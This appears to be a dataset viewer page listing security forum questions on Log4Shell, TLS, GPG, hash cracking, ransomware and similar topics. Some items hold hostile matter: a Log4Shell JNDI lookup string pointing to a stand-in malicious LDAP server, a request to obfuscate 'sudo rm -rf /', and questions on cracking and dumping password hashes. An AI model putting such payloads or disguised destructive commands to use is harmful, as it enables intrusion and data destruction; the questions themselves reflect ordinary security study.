instruction stringlengths 24 29.9k |
|---|
In the OAuth2 Implict Grant flow, the access token is added to the URL fragment as part of the redirect from the Authorization Server to the Relying Party. Since this access token is made visible to the end-user in the Callback URL, this URL could be copied to a separate browser (or device), thereby allowing 2 independ... |
Consider someone has updated the firmware of you PC monitor, notebook or smart device display.
What capabilities does the attacker now have? Could he reinfect your device or some other device where the monitor/display is plugged in?
How could you mitigate the impact of a compromised display?
Slightly related: Are there... |
Is it safe to publish your public GPG keys on GitHub?
And link to them in the signature of the e-mails you send, together with the fingerprint after the link?
|
I am going to put a link to my GPG key in the signature of my e-mails.
This would be both a hyperlink in the form of
https://keyserver.ubuntu.com/pks/lookup?op=get&search=XXXXXX
and the command to download the key:
gpg --recv-keys XXX
How does the recipient of the e-mail make sure he can obtain the right key (by that ... |
According to this older post: https://security.stackexchange.com/a/174968/271114
Intel processors are stateless.
Nowadays a "CPU" is often a SOC integrating neural engines, GPUs, coprocessors, secure enclaves and more.
Other architectures like ARM64, RISC-V and POWER9 are also more common. Do they (or maybe others) kee... |
There used to be a really bad joke from the internet where you would copy something starting with \x0B\x2E... (just an example) and when you execute this command the terminal would interpret it as sudo rm -rf /.
How do you do this kind of obfuscation? I just tried running Cyberchef and turning my command, which is just... |
In TLS 1.2, the cipher suite lists the algorithms for everything (key exchange, signature, cipher/MAC). So by choosing a suite, all the algorithms will have been negotiated. And I can see them from the Security tab in Chrome DevTools, such as:
TLS 1.2, ECDHE_RSA with P-256, and AES_128_GCM or
TLS 1.2, ECDHE_ECDSA with ... |
I am new to HTTPs and want to have my web application on secure ports. For this, I asked our security department to issue certificates. And I provided them with the CSRs. The CSRs were generated on FQDNs which are not there in the URL.
For example, FQDN against which the CSR was generated was mywebappserver whereas the... |
I received and opened a PDF that ran:
GetTickCount
IsDebuggerPresent
SetWindowsHookExW
Sleep
GetAdaptersAddresses
These are the 2 files it wrote:
C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll
C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microso... |
For example I want to have a hard copy of my backup 2FA codes so that if I lose/destroy/don't have my phone or laptop on me. I, of course, do not want them in plain text. I don't want to encrypt them using a secure cryptographic algorithm that I memorize a key for, as I might not have access to a device that can decryp... |
How does Openssl's s_server validate session tickets? I started up an s_server and stored the session ticket in a file, and then shutdown the s_server and started up a new server with the same command. This new server won't accept the old ticket, even though I started up both servers with the same certificates and key ... |
I have a relatively secure device with very limited internet connections and/or activity. One of those connections is to a AWS RDS database (MySQL)
I'm wondering if it's possible that my secure device could be compromised by this connection if the database were to be compromised.
|
It's been my understanding in the past years that it's not easily possible to find out all the subdomains of a domain (unless these are used publicly, like in hyperlinks, etc), and likewise not easily possible to find all domains/submains that are associated to a specific IP.
However, if I lookup any of my IP addresses... |
I just finished installing Nginx on my EC2 Ubuntu Server (AWS) and everything looks normal.
I tested it on my browser by accessing my EC2 public IP. I can see Nginx's welcome message.
It's not a big deal, but still bothering me.
My questions are...
What is the importance of enabling the UFW?
Aren't opening ports 80 & ... |
I have a question about the Vigenere cipher and still do not know how to solve it.
A language has an alphabet of only 4 letters with frequencies as
follow: Pa=40%, Pb=20%, Pc=10% and Pd=30%. Create an encryption
function from this alphabet {a,b,c,d} into the set of numbers 0-9 so
that IC of cyphertexts created by this... |
Assuming a product shelf life of 30 years and the product which is released now in 2021, what is the recommendation/suggestion for hashing or encryption algorithms to use in the product?
That means, should I directly make use of the superior algorithms(SHA-512 for hashing, AES-256 for encryption) or should this be driv... |
Deno (the node.js fork) is designed to be secure by default. Therefore, unless you specifically enable it, a program run with Deno has no file, network, or environment access. Deno has a set of command line flags that allow the process permissions to security-sensitive functions.
https://deno.land/manual/getting_starte... |
Assuming a threat actor would not have a huge amount of resources or is a script kiddie (he could not write a 0-day but he could buy a rubber ducky); in a Windows 10 environment, if the workstation is fully patched, would disabling USB data transfer via an OS setting mitigate any serious risk?
The scenario would be "th... |
For example, I know a password has to have at least 3 symbols, but I don't know where those symbols are. What is the simplest way to specify this when cracking the password with hashcat? The only method I found was through a .hcmask file and then just manually writing down every possible mask (eg ?a?a?a?s?s?s, ?a?a?s?a... |
The title pretty much covers the question. I'm using Linux and, whenever I go to sites like Amazon Prime and such, if I try to watch any of their videos, the player would error out in an error code and claim that it can't play protected content in my browser. A simple google search for that error code will reveal the f... |
We are focusing on mobile phone and hard drive encryptions. This idea can be extended to any data encryption also.
iPhone and recent Androids are all encrypted. We know that changing the password will not change the encrypted data. It only changes the Encrypted Masker Key. For instance:
Master Key is used to encrypt/d... |
I downloaded Whonix xfce-16.0.3.1 QEMU/KVM checked the integrity sha256 and installed it in Devian ASCII. Changed user and passwd. When starting the Gateway only an SSH connection takes place to the ip 146.57.248.255 (umn.edu) from local ip 10.0.2.15 and is returned to 10.233.11.41 this seen via etherape as below. I re... |
I'm streamer and I guess I'm good target for DDOS'ers. Those bad people know my ISP (but they don't know my IP address - ISP changed that for me when the first attack happened). It's a small local ISP (but it's under a bigger ISP) and some guy started a DDOS attack on my ISP to stop my livestream. I tried to contact th... |
I ran nmap scan and output included following line:
3306/tcp open mysql MySQL 5.5.5-10.3.25-MariaDB-0+deb10u1
How do I know which one is actually running, MySQL or MariaDB?
|
I am currently working on a project for a veterinary practice and one of its components is a web-based backoffice for general management.
The practice already has a backoffice-style software, but it's lacking in some features and it's only required for legal reasons.
I was thinking about the authentication process the ... |
Since NGINX does not support sending HTTP/2 requests upstream, what are the present NGINX reverseproxy users doing to mitigate HTTP Request Smuggling vulnerability?
I understand that the best way to prevent HTTP Request Smuggling is by sending HTTP/2 requests end to end. Since NGINX when used as reverseproxy sends requ... |
I want to implement end-to-end encryption on my chat application (available on android, iOS and web). For that I've following mechanism in mind.
Generate Key pairs (Private key and Public key) on sign up
Send Public Key to Server (AWS)
Using another Key pair server will encrypt and store public key
When Another user ... |
I’ve been hit by Ransomware several times this year, and I’m going nuts trying to stop it. About a month ago I got hit, and I did a complete rebuild of my Windows 10 machine. Fresh OS and installed minimal programs. No warez or anything like that. I also installed iDrive for some cloud backups.
A couple of days ago... |
Our project is to apply digital signature to PDF, so each user should have their own key pairs and a certificate. To keep key securely, we plan to purchase HSM, but from what I understand HSM have a limited number of keys that it can store.
So to my question, how should we handle this situation that we have hundreds or... |
Maybe is a silly question but I can't understand exactly why this type of buffer overflow does not work...
Let's me explain with an example.
Suppose we have a program written in c.
This program has 2 function , normal() and special(). In main function we have a pointer which points in address of normal function. Also ... |
I see that HTTPS uses symmetric encryption for the file transfer, often AES. I also read that AES uses padding to help obfuscate the data itself. Though I am curious how powerful that padding is when downloading files.
If a server has a public list of available downloads (in the thousands), and a user were to download ... |
There are over 9000 websites on the web claiming that they can hack Instagram accounts. In reality, none of them does what they say they do.
So, What's their purpose?
These website owners do know that their websites don't work, then why do they add more complexity to their site by adding 'human verification surveys and... |
Suppose there is an application which contained preview functionality, that means whatever the code (if it is PHP, HTML Python) the user writes, the user can preview the code.
For ex:
<?php echo "hello this is test"?>
When user previews it, user gets
hello this is test
Now what if a malicious user execute this:-
<?php... |
I'm doing a capture-the-flag challenge (similar to HackTheBox) and I can't figure it out despite looking at many workarounds how to solve my issue.
I did:
nmap --> got port 8080
firefox -> 10.10.40.122:8080 -> got Apache
msf6 use tomcat_mgr_login in order to get the password (in this case tomcat:tomcat)
use tomcat_mgr... |
I'm going through a TPM tutorial at https://google.github.io/tpm-js/#pg_keys
It says:
Hierarchies differ by when their seeds are created and by who certifies their primary keys.
and
Generally speaking, the endorsement hierarchy is reserved for objects created and certified by the TPM manufacturer.
What does it mean... |
I am not an expert in security items and exploits - so there I would like to know how this recent Log4Shell exploit can affect me as an end user.
Reading the news, the exploit can affect services like "Twitter", "Apple" etc.. But what does it mean for me as an end user? Can someone run code on my machine when I visit A... |
Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren't because the vulnerability uses JNDI (Java Naming and Directory Interface), which I doubt would be relevant in other languages.
|
(This has been marked a duplicate of SSL Cert for sub.domain.com and www.sub.domain.com, but while it's correct that the answer to this question is present in the answers there, that question is distinctly different and people looking for the answer to this one quite likely wouldn't find that one (I certainly didn't). ... |
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:
paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug("Request: {}", paramGivenFromOutside);
Will this code be affected by the exploit?
|
Recently I have noticed that my system doesn't show the UAC prompt whenever I install some application from another source, I have UAC on and everything is working fine, I also have an administrator account, Latest windows 10 version. But it never appears, is it a problem with Windows itself or has my device been compr... |
Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, to 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is depending on log4j-core:2.15.0 and log4j-api:2.15.0 and the logging works appropriately? I am asking this because at the ... |
I was reading owsap top 10 for Web Applications and it comes with File Path Traversal Vulnerability and when i deep looking to it i got it a vulnerability for only reading files from a server and when it comes to write files it called then local file include.
but when i saw these vulnerability:
Apache HTTP Server 2.4.5... |
I have just moved to a new place and the router is controlled by the managing company, what can I do to improve my security and my anonymity under this constraint?
|
I understand the LD_preload trick, but in this tutorial(https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/), they not only give the user the right to keep this environment variable, but also to run one command (find).
My question : isn't this step (allowing the user to run find) useless since t... |
I was trying to unshadow my passwd and shadow file on the new version of john. However, every time I try to use john to decrypt the hash it throws an error.
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
But if I go to take a look at the file, I find my hashes there. Is this happening because ... |
Q: how to securely use pass tool to for scheduled jobs?
One of the tools to store and manage passwords on a unix machine is pass, which is a layer on top of gpg. Any password that I create is encrypted and stored locally, which can be decrypted back again using the private key. Generally, this will require a passphrase... |
This excellent question introduces "TOFU" (trust on first use - e.g. SSH storing fingerprints) and "TBFU" (trust before first use, e.g. PKI Certs, WPA pre-shared-keys).
Can MitM attack be avoided without using a 3rd party?
Obviously, TOFU is useless in the face of an already-established MitM adversary (since you end up... |
How to view all SSL certificates for a website using Chrome? When I click the lock icon, it shows only one certificate. The Security tab shows the same - details of only one certificate. How can I see all the certificates on a website? Is it possible, or do browsers display only the most trusted SSL provider's SSL cert... |
I refer to the Log4j logging framework vulnerability - Source: https://www.wired.com/story/log4j-flaw-hacking-internet/
Since software vulnerabilities is an inevitable part of life, and speed is of an essence when it comes to patching vulnerabilities, other than adopting a reactive posture i.e., patching (patch availab... |
All the things we type (like usernames, passwords, text in a text file etc.) are saved somewhere in some log files? If yes, formatting and initializing the drive, will delete them?
I am asking because I am going to sell my pc for the first time to someone I don't know ...
|
A zero-day exploit affecting the popular Apache Log4j utility
(CVE-2021-44228) was made public on December 9, 2021 that results in
remote code execution (RCE). (From an email CloudFlare sent to users)
Is a site susceptible to the Log4J exploit if all parameters taken from the request are sanitized? The most "lenien... |
I am using a Mac for my daily work, But I do not know if I am vulnerable for the log4j exploit. Is there a way to find out? Is there a way to find all the applications that are using java? How to protect me? Update java? Update the log library? Deactivate the log library? What else and how?
|
I have a question about SSL (self signed certificate) in connection with a subdomain.
The following scenario:
there exists a Motobix camera, which is reachable via a fixed IP. (Example: 192.120.203.32) The goal is to achieve the display of the image in the browser via https.
Procedure:
On a separate web server, I have ... |
According to the notes for CVE-2021-44228 at mitre.org:
Java 8u121 (see
https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
protects against remote code execution by defaulting
"com.sun.jndi.rmi.object.trustURLCodebase" and
"com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".
Therefore, assum... |
I was reading the BitWarden Security Whitepaper (BitWarden is an open source, zero-knowledge password manager that performs encryption/decryption on the client side) and came across the following statement:
A Master Password hash is also generated using PBKDF-SHA256 with a
payload of Master Key and with a salt of the ... |
I've never seen any example of this and I'm just curious why? Why is it not okay just to pass it through HTTPs + encoded in a JWT? I will not be storing the password anywhere on the client side, I will just be reading it once. I'm pretty sure it's not okay but why exactly is the reason?
|
"The HTTP Cross-Origin-Opener-Policy (COOP) response header allows you to ensure a top-level document does not share a browsing context group with cross-origin documents."
In a situation where www.attacker.com opens www.tagetwebsite.com
or
www.attacker.com embeds a iframe with www.tagetwebsite.com
I imagine SOP already... |
Let's say that I purchased a MFA Yubikey device to secure my accounts. If an attacker wanted to compromise my accounts that are secured with this YubiKey, would this be possible without having the actual device?
First let's assume the attacker has had no physical access to the device but has been able to compromise oth... |
I have this key fob for our apartment building, and I want to make a copy of it.
I've taken it to 3 locksmiths who are able to create a copy, but the copies don't work.
I've confirmed that it doesn't appear to be a rolling fob by comparing the frequency and code of the original and the copy after using the original ag... |
According to Wikipedia, in the following cipher suite:
TLS_ECDHE_RSA_WITH_AES_GCM_SHA256
The RSA part denotes the "authentication mechanism during the handshake".
And I'm confused, since from what I know it works like this: The server sends a certificate (let it be a X509 certificate) to the client. Now the client nee... |
I'm doing security labs on portswigger.net. One of the labs asks to avoid authentication. Intercepting the api call I see that payload for authentication is small json:
{
"username": "uname",
"password": "pwd",
"": ""
}
I was doing my best to complete the lab, but didn't get luck. After giving up I've opened soluti... |
Log4shell is making the news. A vulnerability in the widely used logging tool Log4J is putting many servers and even some desktop applications at risk of remote code execution.
How does this vulnerability work? What sort of mistake makes it possible? It is something about format strings and ${jndi:...}, but why would a... |
If a version of log4j2 is present on a server (say, 2.5 or 2.7) but the JndiLookup class does not exist in any jars, does this mean this specific implementation of log4j2 is not vulnerable to Log4Shell?
|
As I understand it, a successful exploit requires a connection to an external server to download a payload. If a device can't be patched or otherwise mitigated, does restricting its outbound access prevent a successful exploit?
Assuming this is an effective technique, which TCP/UDP ports should be blocked?
|
If a vendor provides you with a program written for Java 8, is there any security advantage of running that program in the latest OpenJDK build of Java 11 instead of the latest OpenJDK build of Java 8?
|
Does Log4Shell ("CVE-2021-44228") affect K8S/Containers and/or function-as-a-service (FaaS) running image with affected log4j?
I would like to understand if this vulnerability affects ephemeral setups such as K8S/FaaS and how JNDI lookup can take place in such a setting.
|
Is there any security issue if I use for example my Gmail account to store passwords from another resources instead of using any password manager like a KeePass?
If my password for Gmail account is not duplicated on any other resources, it is strong enough and I have 2FA what is the reason to use password manager? Ques... |
Say that I have a program that needs to communicate with my own server.
I use TLS to secure the connection, however the program is running within a network, which sends all TLS traffic through a TLS inspection proxy and the computer where the program runs trusts the CA certificate of the TLS inspection proxy.
Everythin... |
Considering that a RCE vulnerability has been recently found in the log4j library, a library used in a lot more applications than I thought. The following question comes to my mind.
If an attacker successfully exploits log4shell, does the payload will run as root or as a regular (less-privileges) user?
In other words, ... |
In a multi-tenant application, I'm thinking of the right way to let a tenant add users to its account. Assume the "root" user (that signed up and created the tenant) already exists. At some point, the "root" user or other authorized users may add more users to the tenant. The main information provided when adding the n... |
Using the cipher suite “TLS_AES_128_CCM_SHA256”
This example is referring to a self signed certificate
If a server uses TLS and uses the cipher suite above? How does the certificate get signed if there is not an asymmetric private key to sign it with?
Is the AES premaster secret sent clear text since there is not a pub... |
I recently bought a HDMI to VGA + Audio Out adapter on the internet for the purpose to playing Xbox on an old monitor. It came just inside a plastic bag, so I don't have any guarantees that the equipment have not been opened before.
The adapter is working fine, but now I'm wondering if I could safely plug it into my vi... |
I am building an E2EE chat app where there is one asymmetric key pair per group. Each user also has one asymmetric key pair. All messages in a group chat are encrypted with the group public key and decrypted with the group private key.
When Alice is added to the group, Bob (one of the group admins) encrypts the group's... |
Yesterday, my website bandwidth got over. After seeing the logs I saw this
This request came every 1 second (Different IP's).
Luckily I use Cloudflare. So my question is what are the other things that can I do to prevent such attacks?
|
I have written a small shellcode but it is trapped at execve() by the debugger if it is attached. Can this be bypassed? Note that I can add any instructions to my shellcode, but I don't have root privileges.
|
Today I got an alert on my Elastic SIEM that sysmon.exe has modified or created a root certificate.
I tried to look for the certificate thumbprint in the Microsoft trusted root program and could not find it there.
Is this legitimate behavior ? Please note I have not updated sysmon.
|
We're currently trying to prioritize our mitigations for CVE-2021-44228.
The obvious priority is to deal with any Internet facing java (apache?) applications that use a vulnerable log4j library and\or Java binary first.
For multi-user Linux systems, where users may be able to execute any arbitrary Java stack, is this l... |
This is a question for operating system security experts.
We have an application using one platform/language, and it has to integrate with a library that uses another platform/language. There is no acceptable linking technology, and for unrelated reasons, we can't migrate either side to have both in a common platform/l... |
Assuming the server doesn't send the root CA certificate along with it's certificate and all the intermediates, how does the client know the root CA certificate in order to validate the server's certificate? Is it by the details of the issuer in the server's certificate? That sounds pretty weird, since who guarantees u... |
I'm troubleshooting a certificate issue and I'm looking to see what the proxy is sending to the client for its certificate. I added the tcpdump process to get this output, but I can't seem to figure that out.
Is there anyway to use some tooling to see the certificate? I mean the -----BEGIN CERTIFICATE----- all the way ... |
A number with ISD code +92 sent a video via WhatsApp. No text, only a video. About 20 days later, another number with same ISD sent another video.
Should I open the video?
OR
Should I Report and Block?
Moreover, a family member received the videos as well but from different numbers but same ISD. Can't say if we have be... |
As I first read about Log4Shell my first thought was "ok, this is severe but professionally hosted systems should not be at risk" as most internal systems should be hidden behind a reverse proxy and the actual application servers should have no direct access to external network resources like arbitrary servers on the i... |
I'm trying to run hashcat on a MacBook Pro.
Running hashcat -I to check the devices' informations yields:
hashcat (v6.2.5-38-g8b61f60e8) starting in backend information mode
OpenCL Info:
============
OpenCL Platform ID #1
Vendor..: Apple
Name....: Apple
Version.: OpenCL 1.2 (Aug 11 2021 00:46:43)
Backend Dev... |
I was wondering what Windows/Linux/Live tools allow to retrieve user password hashes of modern 2021 Win10/11 installations. I am not sure if password storage differs in these cases (e.g. different location or hash in use) from previous Windows versions (NT hash stored in SAM):
Microsoft account logged in during instal... |
I have been running an Acunetix vulnerability scan of a remote website (containing 50 subdomains). I am not doing anything else on this system.
However, my system is connected to a remote VPS via VPN, because it is the company's policy.
But I am confused. Is it normal that 9GB of data is uploaded during website vulnera... |
We are planning to lay out guidelines in our organisation for everyone to follow a secure software development lifecycle. As part of this, we plan to adopt the security knowledge framework (SKF) that provides a checklist based on the ASVS standard to determine security requirements.
By specifying the maturity level and... |
My friend had to activate a mobile hotspot on his iphone for half an hour in an airport to connect his laptop, and suddenly he realized that his device was not the only one connected to it.
What are the risks of someone else's unauthorized connection to the hotspot?
Any advice on using hotspots in public places?
|
The last couple of weeks I have been researching possible attacks that can be performed on a Tor hidden service using SSH from a location different from that of the server, assuming the .onion address has already been deanonymised.
I am only interested in SSH related-attacks. The only attacks I have found on the SSH pr... |
Do pdf files pose a higher security risk than regular image files (png, jpeg, etc.)? In my understanding is that most image files don't carry any security risk because all exploits were fixed, but there are a lot more security risks for PDF files. Is this the case?
|
After the log4j vulnerability was announced, I scanned my Mac to see if any applications were using it.
find / -name "*log4j*" 2>/dev/null
Here's the output that indicates that Xcode has log4j bundled in:
./System/Volumes/Data/Applications/Xcode.app/Contents/Developer/usr/share/xcs/xcsd/node_modules/nano/node_modules/... |
Virtual machines and their disk images are simply files residing somewhere. So I supposed this means that, for example, a stopped VM is potentially accessible on a file system. What could an attacker learn from the virtual image that might undermine security - especially given that cloud technologies are built on VMs
|
I have noticed some of the OWASP rules from Azure WAF are rejecting OData default filtered such as $select, suspecting it to be SQL injection. How can you handle the nature of OData from Azure WAF?
1. Warning. Pattern match \"(^[\"'`;]+|[\"'`]+$)\" at ARGS:$filter
2. Matched Data: $select found within ARGS_NAMES:$selec... |
I have my domain .key and .crt file.
the key file include "-----BEGIN PRIVATE KEY-----"
when i use command on centos:
tshark -r /tmp/xx.pcap -o 'ssl.keys_list:any,443,http,/tmp/private.key' -o 'ssl.debug_file:/tmp/ssl.log' -Y http
the command output just HTTP traffic,can not decrypt HTTPS.
check the ssl.log:
Wires... |
Background
A customer complained to a mobile phone company that they were receiving messages that were leaving the screen turned on until it was noticed by the customer (usually many hours) by which time the battery was almost completely drained, and that the messages did not appear in the inbox (or anywhere else).
Th... |
Two-factor or multi-factor authentication is based on three possible forms of authentication:
Something you know
Something you have
Something you are
Since username and password are considered as "something you know", can a client ID and secret sent as part of an API request be considered "something you have" as it i... |
I'm trying to find a solution to be able to be alerted of security alerts for a list of software, hardware that we are using.
I've found https://www.secalerts.co, which looks good, but it seems that sometimes the alert comes a bit late. I've received an alert yesterday for something that was already patched by the dev ... |
I am using let's encrypt to generate a certificate. It contains 'fullchain.pem' and 'privkey.pem'. should I treated the let's encrypt fullchain.pem as a public key? I find the public key certificate format as same with the fullchain.pem. When the google cloud ask me to upload the public key to bind with the domain, I ... |
I'm wondering if there are any security concerns with installing PostgreSQL on a Mac using the app?
https://www.postgresql.org/download/macosx/
I had a look at the data folder and it's owned by me rather than the best practice which I believe is to create a user just for postgres and then install it with that user. But... |
I have certificate for a.com that has two alternative domains: *.b.com and c.com. When I have the following in my /etc/hosts:
<IP_OF_test.b.com> b.com
If I then enter https://b.com in my browser, I would expect the server behind *.b.com to accept it but it gives the ERR_CERT_COMMON_NAME_INVALID error despite showing m... |
Chase banking has two odd restrictions on their accepted passwords.
Passwords have a maximum length of 32 characters
Passwords can not contain special characters or punctuation
I am a software developer that has built auth/auth systems in the past. The restriction on special characters seems like a horrible attempt a... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.